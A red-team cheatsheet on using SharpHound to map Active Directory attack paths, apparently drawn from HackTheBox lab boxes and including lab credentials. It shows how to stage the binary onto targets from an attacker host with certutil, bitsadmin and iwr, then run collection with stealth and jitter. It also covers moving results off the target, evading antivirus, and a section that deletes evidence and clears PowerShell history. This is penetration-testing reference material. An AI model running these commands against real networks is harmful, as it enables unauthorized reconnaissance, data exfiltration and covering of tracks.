daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

sharphound.md (18905B)


      1 ---
      2 title: "SharpHound_"
      3 description: "⚠️ Note: Make sure your SharpHound version matches your BloodHound version! You can check the compatible version in BloodHound CE's web UI under Settings…"
      4 category: active-directory
      5 subcategory: "Tooling & Recon"
      6 tags: ["active-directory", "adcs", "privilege-escalation"]
      7 tools: ["Impacket", "BloodHound", "SharpHound", "Evil-WinRM", "Certify"]
      8 difficulty: intermediate
      9 updated: "2026-08-10"
     10 source: "vault:ActiveDirectory/SharpHound_Cheatsheet.md"
     11 ---
     12 # 🩸 SharpHound.exe Cheatsheet
     13 
     14 > **Complete guide to using SharpHound for Active Directory enumeration**
     15 
     16 ---
     17 
     18 ## πŸ“‹ Table of Contents
     19 
     20 - [Overview](#-overview)
     21 - [Upload Methods](#-upload-methods-to-target)
     22 - [Basic Usage](#-basic-usage)
     23 - [Collection Methods](#-collection-methods)
     24 - [Advanced Options](#-advanced-options)
     25 - [BloodHound Python Equivalent](#-bloodhound-python-equivalent)
     26 - [Download Results](#-download-results)
     27 - [Troubleshooting](#-troubleshooting)
     28 
     29 ---
     30 
     31 ## 🎯 Overview
     32 
     33 **SharpHound** is the official data collector for BloodHound written in C#. It enumerates Active Directory environments to map attack paths and privilege escalation opportunities.
     34 
     35 ### Key Features
     36 - βœ… Native Windows execution (no dependencies)
     37 - βœ… Multiple collection methods
     38 - βœ… LDAP and API-based enumeration
     39 - βœ… Stealth and performance options
     40 - βœ… Outputs ZIP files for BloodHound ingestion
     41 
     42 ### Important Version Information
     43 
     44 **SharpHound Versions:**
     45 - **Latest:** Version 2.8.0 (as of November 2025)
     46 - **Compatibility:** Designed for BloodHound Community Edition (CE)
     47 - **Download:** Always get the latest from [GitHub Releases](https://github.com/SpecterOps/SharpHound/releases)
     48 - **Target Framework:** .NET 4.6.2
     49 
     50 ⚠️ **Note:** Make sure your SharpHound version matches your BloodHound version! You can check the compatible version in BloodHound CE's web UI under Settings β†’ Download Collectors.
     51 
     52 ---
     53 
     54 ## πŸ“€ Upload Methods to Target
     55 
     56 ### Method 1: SMB Server (impacket-smbserver)
     57 
     58 **On Kali Linux:**
     59 ```bash
     60 # Start SMB server in directory containing SharpHound.exe
     61 sudo impacket-smbserver share . -smb2support -username user -password pass
     62 
     63 # Or without authentication (less secure)
     64 sudo impacket-smbserver share . -smb2support
     65 ```
     66 
     67 **On Target Windows:**
     68 ```powershell
     69 # With authentication
     70 net use \\10.10.14.5\share /user:user pass
     71 copy \\10.10.14.5\share\SharpHound.exe .
     72 
     73 # Without authentication
     74 copy \\10.10.14.5\share\SharpHound.exe .
     75 
     76 # Alternative: Run directly from SMB share
     77 \\10.10.14.5\share\SharpHound.exe -c All
     78 ```
     79 
     80 ---
     81 
     82 ### Method 2: Python Web Server
     83 
     84 **On Kali Linux:**
     85 ```bash
     86 # Python 3 (default in Kali)
     87 python3 -m http.server 8000
     88 
     89 # Python 3 with specific IP binding
     90 python3 -m http.server 8000 --bind 10.10.14.5
     91 ```
     92 
     93 **On Target Windows:**
     94 ```powershell
     95 # PowerShell Download
     96 Invoke-WebRequest -Uri http://10.10.14.5:8000/SharpHound.exe -OutFile SharpHound.exe
     97 
     98 # Short form
     99 iwr -uri http://10.10.14.5:8000/SharpHound.exe -o SharpHound.exe
    100 
    101 # Certutil (alternative method)
    102 certutil -urlcache -f http://10.10.14.5:8000/SharpHound.exe SharpHound.exe
    103 
    104 # BITSAdmin
    105 bitsadmin /transfer mydownload /download /priority high http://10.10.14.5:8000/SharpHound.exe C:\Temp\SharpHound.exe
    106 ```
    107 
    108 ---
    109 
    110 ### Method 3: WinRM Upload (evil-winrm)
    111 
    112 **Using evil-winrm:**
    113 ```bash
    114 # Connect to target
    115 evil-winrm -i 10.10.11.41 -u judith.mader -p judith09
    116 
    117 # Once connected, upload SharpHound
    118 upload /path/to/SharpHound.exe
    119 ```
    120 
    121 **Within evil-winrm session:**
    122 ```powershell
    123 *Evil-WinRM* PS C:\Users\judith.mader\Documents> upload /opt/SharpHound.exe
    124 *Evil-WinRM* PS C:\Users\judith.mader\Documents> .\SharpHound.exe -c All
    125 ```
    126 
    127 ---
    128 
    129 ### Method 4: Base64 Encoding (Small Files)
    130 
    131 **On Kali Linux:**
    132 ```bash
    133 # Encode SharpHound
    134 base64 -w 0 SharpHound.exe > sharphound_b64.txt
    135 ```
    136 
    137 **On Target Windows:**
    138 ```powershell
    139 # Decode and save (paste base64 string)
    140 $b64 = "TVqQAAMAAAAEAAAA..." # Your base64 string
    141 [IO.File]::WriteAllBytes("SharpHound.exe", [Convert]::FromBase64String($b64))
    142 ```
    143 
    144 ---
    145 
    146 ## πŸš€ Basic Usage
    147 
    148 ### Standard Execution
    149 
    150 ```powershell
    151 # Run all collection methods (most common)
    152 .\SharpHound.exe --CollectionMethods All
    153 
    154 # Short form also works
    155 .\SharpHound.exe -c All
    156 
    157 # Run with specific collection methods
    158 .\SharpHound.exe -c Session,LoggedOn
    159 
    160 # Specify domain explicitly
    161 .\SharpHound.exe -c All -d certified.htb
    162 
    163 # Custom output directory
    164 .\SharpHound.exe -c All --OutputDirectory C:\Temp
    165 
    166 # Custom output prefix
    167 .\SharpHound.exe -c All --OutputPrefix custom_name
    168 
    169 # Automatically create ZIP file (recommended)
    170 .\SharpHound.exe -c All --ZipFileName output.zip
    171 ```
    172 
    173 ---
    174 
    175 ## 🎯 Collection Methods
    176 
    177 | Method | Description | Usage |
    178 |--------|-------------|-------|
    179 | **All** | Runs all collection methods except LoggedOn | `-c All` |
    180 | **Default** | Group, LocalAdmin, Session, Trusts | `-c Default` |
    181 | **DCOnly** | LDAP-only, no computer queries | `-c DCOnly` |
    182 | **Group** | Group memberships | `-c Group` |
    183 | **LocalAdmin** | Local admin rights | `-c LocalAdmin` |
    184 | **Session** | Active sessions | `-c Session` |
    185 | **Trusts** | Domain trusts | `-c Trusts` |
    186 | **ACL** | Object permissions | `-c ACL` |
    187 | **Container** | OU structure | `-c Container` |
    188 | **GPOLocalGroup** | GPO-enforced groups | `-c GPOLocalGroup` |
    189 | **SPNTargets** | Service Principal Names | `-c SPNTargets` |
    190 | **LoggedOn** | Logged on users (privileged) | `-c LoggedOn` |
    191 | **ObjectProps** | Object properties | `-c ObjectProps` |
    192 | **RDP** | RDP access rights | `-c RDP` |
    193 | **DCOM** | DCOM access rights | `-c DCOM` |
    194 | **PSRemote** | PSRemote access | `-c PSRemote` |
    195 | **CARegistry** | AD CS registry keys | `-c CARegistry` |
    196 | **DCRegistry** | DC registry data | `-c DCRegistry` |
    197 
    198 ### Combining Methods
    199 
    200 ```powershell
    201 # Multiple methods
    202 .\SharpHound.exe -c Group,Session,Trusts
    203 
    204 # Comprehensive collection
    205 .\SharpHound.exe -c All
    206 
    207 # LDAP-only (stealth, no computer connections)
    208 .\SharpHound.exe -c DCOnly
    209 ```
    210 
    211 ---
    212 
    213 ## βš™οΈ Advanced Options
    214 
    215 ### Domain Controller Specification
    216 
    217 ```powershell
    218 # Specify domain controller by IP
    219 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41
    220 
    221 # Specify by hostname
    222 .\SharpHound.exe -c All -d certified.htb --DomainController DC01.certified.htb
    223 
    224 # Multiple domains
    225 .\SharpHound.exe -c All -d certified.htb,external.local
    226 ```
    227 
    228 ### Authentication Options
    229 
    230 ```powershell
    231 # Use LDAP credentials (alternate to current user context)
    232 .\SharpHound.exe -c All --LdapUsername judith.mader --LdapPassword judith09
    233 
    234 # Run with different user context using runas
    235 runas /user:certified.htb\judith.mader /netonly cmd
    236 # Then run SharpHound from that context
    237 .\SharpHound.exe -c All -d certified.htb
    238 
    239 # Override username for NetSessionEnum
    240 .\SharpHound.exe -c Session --OverrideUserName judith.mader
    241 ```
    242 
    243 ### Performance & Stealth
    244 
    245 ```powershell
    246 # Stealth mode (slower, LDAP-focused, removes noisy methods)
    247 .\SharpHound.exe -c All --Stealth
    248 
    249 # Throttle requests (milliseconds between requests)
    250 .\SharpHound.exe -c All --Throttle 1000
    251 
    252 # Jitter (randomize delay, percentage)
    253 .\SharpHound.exe -c All --Jitter 20
    254 
    255 # Skip port scan (don't check if 445 is open)
    256 .\SharpHound.exe -c All --SkipPortCheck
    257 
    258 # No save cache
    259 .\SharpHound.exe -c All --NoSaveCache
    260 
    261 # Disable certificate verification (LDAPS)
    262 .\SharpHound.exe -c All --DisableCertVerification
    263 
    264 # Disable Kerberos signing/sealing (not recommended)
    265 .\SharpHound.exe -c All --DisableSigning
    266 ```
    267 
    268 ### LDAP Options
    269 
    270 ```powershell
    271 # Specify LDAP port (default 389)
    272 .\SharpHound.exe -c All --LdapPort 389
    273 
    274 # Use secure LDAP (port 636)
    275 .\SharpHound.exe -c All --SecureLDAP
    276 
    277 # Combine LDAPS with specific port
    278 .\SharpHound.exe -c All --LdapPort 636 --SecureLDAP
    279 
    280 # Use Global Catalog port
    281 .\SharpHound.exe -c All --LdapPort 3268
    282 ```
    283 
    284 ### Loop Collection
    285 
    286 ```powershell
    287 # Loop collection (great for session gathering)
    288 # Loops for 2 hours, creating a ZIP file after each iteration
    289 .\SharpHound.exe -c Session --Loop --Loopduration 02:00:00
    290 
    291 # Loop with interval between iterations
    292 # Runs for 3 hours, waits 10 minutes between each collection
    293 .\SharpHound.exe -c Session --Loop --Loopduration 03:00:00 --LoopInterval 00:10:00
    294 ```
    295 
    296 ### Exclusions & Filters
    297 
    298 ```powershell
    299 # Exclude domain controllers from enumeration
    300 .\SharpHound.exe -c All --ExcludeDCs
    301 
    302 # Skip registry-based enumeration
    303 .\SharpHound.exe -c All --SkipRegistryLoggedOn
    304 
    305 # Use specific computer list file
    306 .\SharpHound.exe -c All --ComputerFile C:\computers.txt
    307 
    308 # LDAP filter for computers
    309 .\SharpHound.exe -c All --LdapFilter "(operatingSystem=*Server*)"
    310 ```
    311 
    312 ### Output Options
    313 
    314 ```powershell
    315 # Prettify JSON output (larger files, more readable)
    316 .\SharpHound.exe -c All --PrettyPrint
    317 
    318 # Track computer connection status to CSV
    319 .\SharpHound.exe -c All --TrackComputerCalls
    320 
    321 # Random file names for output
    322 .\SharpHound.exe -c All --RandomFilenames
    323 ```
    324 
    325 ---
    326 
    327 ## 🐍 BloodHound Python Equivalent
    328 
    329 ### Your Original Command
    330 
    331 ```bash
    332 sudo bloodhound-python -c all -u judith.mader -p judith09 -d certified.htb -ns 10.10.11.41 --zip
    333 ```
    334 
    335 ### SharpHound Equivalent
    336 
    337 **Option 1: Direct Execution (Already authenticated as judith.mader)**
    338 
    339 ```powershell
    340 # If you're already authenticated as judith.mader on Windows
    341 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 --ZipFileName certified_bloodhound.zip
    342 ```
    343 
    344 **Option 2: Using LDAP Credentials**
    345 
    346 ```powershell
    347 # Use alternate credentials via LDAP authentication
    348 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41 --LdapUsername judith.mader --LdapPassword judith09
    349 ```
    350 
    351 **Option 3: Using RunAs with Network Credentials**
    352 
    353 ```powershell
    354 # Run cmd with network credentials
    355 runas /user:certified.htb\judith.mader /netonly cmd
    356 
    357 # In the new cmd window
    358 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41
    359 ```
    360 
    361 **Option 4: Using evil-winrm**
    362 
    363 ```bash
    364 # From Kali, connect via WinRM
    365 evil-winrm -i 10.10.11.41 -u judith.mader -p judith09
    366 
    367 # Upload and run SharpHound
    368 upload /path/to/SharpHound.exe
    369 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41
    370 ```
    371 
    372 **Option 5: Using Impacket's psexec/wmiexec**
    373 
    374 ```bash
    375 # Execute SharpHound remotely
    376 impacket-wmiexec certified.htb/judith.mader:judith09@10.10.11.41 "C:\Temp\SharpHound.exe -c All"
    377 ```
    378 
    379 ### Parameter Mapping
    380 
    381 | bloodhound-python | SharpHound.exe | Description |
    382 |-------------------|----------------|-------------|
    383 | `-c all` | `-c All` or `--CollectionMethods All` | Collection method |
    384 | `-u judith.mader` | `--LdapUsername judith.mader` | Username (or use current context) |
    385 | `-p judith09` | `--LdapPassword judith09` | Password (or use current context) |
    386 | `-d certified.htb` | `-d certified.htb` or `--Domain certified.htb` | Domain |
    387 | `-ns 10.10.11.41` | `--DomainController 10.10.11.41` | Domain controller |
    388 | `--zip` | `--ZipFileName output.zip` | ZIP output (default behavior) |
    389 
    390 ---
    391 
    392 ## πŸ“₯ Download Results
    393 
    394 ### Method 1: SMB Server (Retrieve Files)
    395 
    396 ```powershell
    397 # On Windows, copy results back
    398 copy 20241127*.zip \\10.10.14.5\share\
    399 ```
    400 
    401 ### Method 2: Evil-WinRM Download
    402 
    403 ```powershell
    404 # In evil-winrm session
    405 download C:\Path\To\20241127_BloodHound.zip
    406 ```
    407 
    408 ### Method 3: Base64 Encoding (Small ZIP files)
    409 
    410 **On Windows:**
    411 ```powershell
    412 # Encode the ZIP file
    413 $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes("20241127_BloodHound.zip"))
    414 $b64 | Out-File -Encoding ASCII bloodhound_b64.txt
    415 ```
    416 
    417 **On Kali:**
    418 ```bash
    419 # Copy the base64 string and decode
    420 base64 -d bloodhound_b64.txt > bloodhound_data.zip
    421 ```
    422 
    423 ### Method 4: Python Web Server Upload
    424 
    425 **On Windows (with Python):**
    426 ```powershell
    427 # Start simple HTTP server
    428 python -m http.server 8080
    429 
    430 # Then download from Kali
    431 wget http://10.10.11.41:8080/20241127_BloodHound.zip
    432 ```
    433 
    434 ---
    435 
    436 ## πŸ”₯ Common Usage Scenarios
    437 
    438 ### Scenario 1: Quick Full Enumeration
    439 
    440 ```powershell
    441 # Complete enumeration with ZIP output
    442 .\SharpHound.exe -c All -d certified.htb --ZipFileName certified_full.zip
    443 ```
    444 
    445 ### Scenario 2: Session Hunting
    446 
    447 ```powershell
    448 # Loop session collection for 2 hours, checking every 10 minutes
    449 .\SharpHound.exe -c Session --Loop --Loopduration 02:00:00 --LoopInterval 00:10:00
    450 ```
    451 
    452 ### Scenario 3: Stealth Enumeration
    453 
    454 ```powershell
    455 # Stealth mode (LDAP-focused, removes noisy methods like LoggedOn)
    456 .\SharpHound.exe -c All --Stealth
    457 
    458 # Manual stealth (custom throttling and jitter)
    459 .\SharpHound.exe -c Group,ACL,ObjectProps --Throttle 2000 --Jitter 25
    460 ```
    461 
    462 ### Scenario 4: LDAP-Only Collection (No Computer Connections)
    463 
    464 ```powershell
    465 # DCOnly - only queries domain controller via LDAP
    466 .\SharpHound.exe -c DCOnly -d certified.htb
    467 
    468 # Exclude DCs from computer enumeration
    469 .\SharpHound.exe -c All --ExcludeDCs
    470 ```
    471 
    472 ### Scenario 5: Specific Data Only
    473 
    474 ```powershell
    475 # Only collect groups and trusts
    476 .\SharpHound.exe -c Group,Trusts -d certified.htb
    477 
    478 # Default collection (Group, LocalAdmin, Session, Trusts)
    479 .\SharpHound.exe -c Default
    480 ```
    481 
    482 ### Scenario 6: Multi-Domain Environment
    483 
    484 ```powershell
    485 # Enumerate trust relationships first
    486 .\SharpHound.exe -c Trusts
    487 
    488 # Then enumerate specific domains
    489 .\SharpHound.exe -c All -d certified.htb,child.certified.htb
    490 
    491 # Or enumerate entire forest
    492 .\SharpHound.exe -c All --SearchForest
    493 ```
    494 
    495 ### Scenario 7: Using LDAPS (Secure LDAP)
    496 
    497 ```powershell
    498 # Use LDAPS for encrypted communication
    499 .\SharpHound.exe -c All --SecureLDAP -d certified.htb
    500 ```
    501 
    502 ---
    503 
    504 ## πŸ› Troubleshooting
    505 
    506 ### Common Errors
    507 
    508 **"Could not resolve domain"**
    509 ```powershell
    510 # Solution: Specify domain controller explicitly
    511 .\SharpHound.exe -c All -d certified.htb --DomainController 10.10.11.41
    512 ```
    513 
    514 **"Access Denied"**
    515 ```powershell
    516 # Verify credentials and permissions
    517 whoami /all
    518 
    519 # Check domain connectivity
    520 nltest /dsgetdc:certified.htb
    521 
    522 # Try using LDAP credentials
    523 .\SharpHound.exe -c All --LdapUsername judith.mader --LdapPassword judith09
    524 ```
    525 
    526 **"LDAP connection failed"**
    527 ```powershell
    528 # Try different LDAP port (Global Catalog)
    529 .\SharpHound.exe -c All --LdapPort 3268
    530 
    531 # Try plain LDAP
    532 .\SharpHound.exe -c All --LdapPort 389
    533 
    534 # Try LDAPS (secure)
    535 .\SharpHound.exe -c All --SecureLDAP
    536 
    537 # Disable signing (not recommended, but may help)
    538 .\SharpHound.exe -c All --DisableSigning
    539 ```
    540 
    541 **No output file generated**
    542 ```powershell
    543 # Specify output directory with write permissions
    544 .\SharpHound.exe -c All --OutputDirectory C:\Temp
    545 
    546 # Check for actual errors in console output
    547 # Ensure you have permissions to current directory
    548 ```
    549 
    550 **"Port 445 not open" errors**
    551 ```powershell
    552 # Skip port checks (useful in restricted environments)
    553 .\SharpHound.exe -c All --SkipPortCheck
    554 ```
    555 
    556 ### Performance Issues
    557 
    558 ```powershell
    559 # Add throttling (wait time between requests)
    560 .\SharpHound.exe -c All --Throttle 500 --Jitter 15
    561 
    562 # Reduce to LDAP-only collection
    563 .\SharpHound.exe -c DCOnly
    564 ```
    565 
    566 ### Detection/AV Issues
    567 
    568 ```powershell
    569 # Use stealth mode
    570 .\SharpHound.exe -c All --Stealth
    571 
    572 # Run from memory (use PowerShell wrapper)
    573 Import-Module .\SharpHound.ps1
    574 Invoke-BloodHound -CollectionMethod All
    575 
    576 # Obfuscate or recompile SharpHound from source
    577 ```
    578 
    579 ---
    580 
    581 ## πŸ“Š Output Files
    582 
    583 SharpHound generates the following files:
    584 
    585 | File | Description |
    586 |------|-------------|
    587 | `YYYYMMDDHHMMSS_BloodHound.zip` | Main output (import to BloodHound) |
    588 | `YYYYMMDDHHMMSS_computers.json` | Computer objects |
    589 | `YYYYMMDDHHMMSS_users.json` | User objects |
    590 | `YYYYMMDDHHMMSS_groups.json` | Group objects |
    591 | `YYYYMMDDHHMMSS_domains.json` | Domain information |
    592 | `YYYYMMDDHHMMSS_gpos.json` | Group Policy Objects |
    593 | `YYYYMMDDHHMMSS_ous.json` | Organizational Units |
    594 | `YYYYMMDDHHMMSS_containers.json` | Container objects |
    595 
    596 **Import to BloodHound:**
    597 ```bash
    598 # On Kali, start BloodHound
    599 sudo neo4j start
    600 bloodhound
    601 
    602 # Upload the ZIP file through the GUI
    603 # Or use bloodhound-python to directly upload
    604 ```
    605 
    606 ---
    607 
    608 ## πŸ”— Useful Resources
    609 
    610 - **SharpHound GitHub (Official)**: https://github.com/SpecterOps/SharpHound
    611 - **BloodHound CE Documentation**: https://bloodhound.specterops.io/
    612 - **SharpHound Flags Reference**: https://bloodhound.specterops.io/collect-data/ce-collection/sharphound-flags
    613 - **Download SharpHound**: https://github.com/SpecterOps/SharpHound/releases
    614 - **BloodHound GitHub**: https://github.com/SpecterOps/BloodHound
    615 - **SpecterOps Blog**: https://posts.specterops.io/ (latest research and updates)
    616 - **BloodHound Slack**: https://bloodhoundgang.herokuapp.com/ (community support)
    617 
    618 ### Alternative Collectors
    619 - **RustHound**: Rust-based collector (cross-platform, AV evasion)
    620 - **AzureHound**: Azure AD/Entra ID collector
    621 - **SharpHound.ps1**: PowerShell wrapper for in-memory execution
    622 
    623 ---
    624 
    625 ## πŸ’‘ Pro Tips
    626 
    627 1. **Always create ZIP files** - Use `--ZipFileName output.zip` for easier exfiltration and import
    628 2. **Use loop collection for sessions** - Session data changes frequently; loop for better coverage
    629 3. **Start with Default or All collection** - Get comprehensive data first, then target specific areas
    630 4. **Check SharpHound version compatibility** - Match SharpHound version to your BloodHound instance
    631 5. **Use --Stealth for red teams** - Automatically removes noisy collection methods
    632 6. **Leverage --SearchForest** - Enumerate all domains in forest automatically (requires trust)
    633 7. **Time your collection wisely** - Run during business hours for more active sessions
    634 8. **Use LDAPS when possible** - `--SecureLDAP` encrypts LDAP traffic
    635 9. **Consider AV/EDR detection** - SharpHound is heavily signatured; consider obfuscation
    636 10. **Clean up after yourself** - Delete SharpHound and output files during operations
    637 11. **Document your collection** - Note which methods were used and when
    638 12. **Use --LdapUsername/--LdapPassword** - When you can't use runas or current context
    639 13. **Combine with other tools** - Use with PowerView, ADRecon, Certify for full coverage
    640 14. **Review collection methods** - Not all methods are needed; `DCOnly` is great for stealth
    641 
    642 ### Advanced Tips
    643 
    644 - **Registry-based collection** is noisy - Consider excluding with `--SkipRegistryLoggedOn`
    645 - **Computer file lists** work great - Use `--ComputerFile` to target specific systems
    646 - **Global Catalog port (3268)** can sometimes bypass restrictions
    647 - **TrackComputerCalls** helps identify connectivity issues
    648 - **RandomFilenames** can help avoid simple file-based detections
    649 
    650 ---
    651 
    652 ## ⚠️ Operational Security
    653 
    654 ```powershell
    655 # Delete evidence after exfiltration
    656 del SharpHound.exe
    657 del *_BloodHound.zip
    658 del *_computers.json
    659 del *_users.json
    660 # ... delete all output files
    661 
    662 # Clear PowerShell history
    663 Clear-History
    664 Remove-Item (Get-PSReadlineOption).HistorySavePath
    665 
    666 # Check for running processes
    667 Get-Process | Where-Object {$_.ProcessName -like "*sharp*"}
    668 ```
    669 
    670 ---
    671 
    672 **Created by NetRunner | For Ethical Hacking & Penetration Testing** πŸŽ“πŸ”
    673 
    674 
    675 
    676 ## SharpHound.ps1
    677 ```powershell
    678 # After uploading SharpHound.ps1:
    679 Import-Module .\SharpHound.ps1
    680 Invoke-BloodHound -CollectionMethod All -Domain htb.local -DomainController 10.129.15.16 -LDAPUser svc-alfresco -LDAPPass s3rvice
    681 ```